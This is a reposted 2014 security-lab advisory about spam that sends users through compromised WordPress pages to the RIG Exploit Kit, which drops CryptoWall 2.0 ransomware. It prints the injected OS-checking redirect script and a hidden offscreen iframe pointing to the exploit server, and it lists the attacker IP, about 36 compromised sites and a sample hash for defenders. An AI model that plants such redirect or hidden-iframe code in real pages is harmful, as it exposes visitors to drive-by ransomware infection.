HackDig : Dig high-quality web security articles for hackers

RIG Exploit Kit Dropping CryptoWall 2.0

2014-10-17 17:25

ThreatTrack Security Labs today observed spammers exploiting vulnerable WordPress links to redirect users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0.

CryptoWall 2.0, of course, is the nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom.

The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog. But dropping CryptoWall 2.0 seems to be a new twist.

The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp://206.253.165.76:8080

The exploit redirector is hxxp://206.253.165.76:8080/ord/rot.php

And the spam Dynamoo reported is hxxp://206.253.165.76:8080/ord/ef.html

Users are receiving malicious spam purporting to be from eFax with compromised WordPress links that redirect to RIG Exploit Kit serving CryptoWall 2.0.

Users are receiving malicious spam purporting to be from eFax with compromised WordPress links that redirect to RIG Exploit Kit serving CryptoWall 2.0.

Compromised WordPress links contain the following code:

<script>

var OSName=”Unknown OS”;

if (navigator.appVersion.indexOf(“Win”)!=-1) OSName=”Windows”; if (navigator.appVersion.indexOf(“Mac”)!=-1) OSName=”MacOS”; if (navigator.appVersion.indexOf(“X11″)!=-1) OSName=”UNIX”; if (navigator.appVersion.indexOf(“Linux”)!=-1) OSName=”Linux”; var1=112; var2=var1;

if(OSName==”Windows”) {location.replace(“hxxp://206.253.165.76:8080/ord/rot.php”);}else{location.replace(“http://google.com/search?q=efax”);}

</script>

The following is a list of compromised WordPress links already identified to contain the redirect:

hxxp://andreealeftercoach.ro/wp-includes/js/tinymce/skins/wordpress/images/meses.html

hxxp://diyarbakirsporhaber.com/wp-includes/js/tinymce/plugins/compat3x/css/meses.html

hxxp://gerbiz.com/wp-content/themes/g4/meses.html

hxxp://redeemer.movytouch.com/es/css/font/meses.html

hxxp://stopcountingjusteat.com/wp-content/themes/stopcounting/meses.html

hxxp://kurucaykoop.com/wp-content/themes/parallelus-traject/meses.html

hxxp://protasova.pro/wp-content/themes/pravo/meses.html

hxxp://jcijakarta.com/wp-content/themes/unik/meses.html

hxxp://kashmirlink.com/wp-content/themes/jarida/meses.html

hxxp://headsortails1995.com/wp-content/themes/twentythirteen/meses.html

hxxp://mercydentists.com/wp-content/themes/MedicalDoctor/meses.html

hxxp://fullofyourselfies.com/wp-content/themes/Blog-O-Trike/meses.html

hxxp://phantichthitruong.net/wp-content/themes/twentytwelve/meses.html

hxxp://allydeal.com/wp-content/themes/twentythirteen/meses.html

hxxp://mondayswithjim.com/wp-content/uploads/meses.html

hxxp://owingsmillsdodgeservice.com/wp-content/themes/ebo-1/meses.html

hxxp://ankaradugunorganizasyonlari.com/wp-content/themes/twentyfourteen/meses.html

hxxp://brazza-news.com/wp-content/themes/flavor19/meses.html

hxxp://earthmediagroup.in/wp-content/themes/emghtml/meses.html

hxxp://tadarok.com/wp-content/themes/deadline/meses.html

hxxp://yottabytes.info/wp-content/uploads/meses.html

hxxp://sarzamin126.com/wp-content/themes/banda-musictemplate/meses.html

hxxp://beautyspa-website.com/wp-content/uploads/meses.html

hxxp://vsstone.ru/images/highslide/graphics/outlines/meses.html

hxxp://test.mosadal.com/wp-content/themes/twentyten/meses.html

hxxp://peliculasya.org/wp-content/themes/accentbox/meses.html

hxxp://jobeky.com/wp-content/themes/jobify/meses.html

hxxp://justdeals.org/wp-content/themes/deals/meses.html

hxxp://pornoba.info/wp-content/themes/new_porn_Theme/meses.html

hxxp://mehmet-kaya.net/wp-content/themes/bliss/meses.html

hxxp://ronleffler.com/wp-content/themes/Avada/meses.html

hxxp://sketchiran.com/wp-content/themes/Factory/meses.html

hxxp://hackedipaj.esy.es/wp-content/themes/twentyten/meses.html

hxxp://berita-dewasa.com/wp-content/themes/GeminiWPTheme/meses.html

hxxp://oneway.vn/wp-content/themes/oneway/meses.html

hxxp://tuestado.co/wp-content/themes/agera/meses.html

The link, hxxp://206.253.165.76:8080/ord/rot.php loads an iframe with a rotating malicious link that looks like:

<iframe src=”hxxp://cname.doyleware.com/?PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg|M2NlNGY0MWE2NjAwZDQxMWRmNGQyZTZhZjJjYmQ3MDU” width=”468″ height=”60″ style=”position:absolute;left:-10000px;”></iframe>

This malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0.

The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402

Defend against RIG Exploit Kit by patching your PC to minimize your exposure to the risk created by out-of-date vulnerable software.

Credit: Matthew Mesa, Malware Researcher, ThreatTrack Security Labs

The post RIG Exploit Kit Dropping CryptoWall 2.0 appeared first on ThreatTrack Security Labs Blog.


Source: /Ya28chuInpa/3~/ytiruceskcarttaerht/r~/moc.elgoog.yxorpdeef

“RIG Exploit Kit Dropping CryptoWall 2.0”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud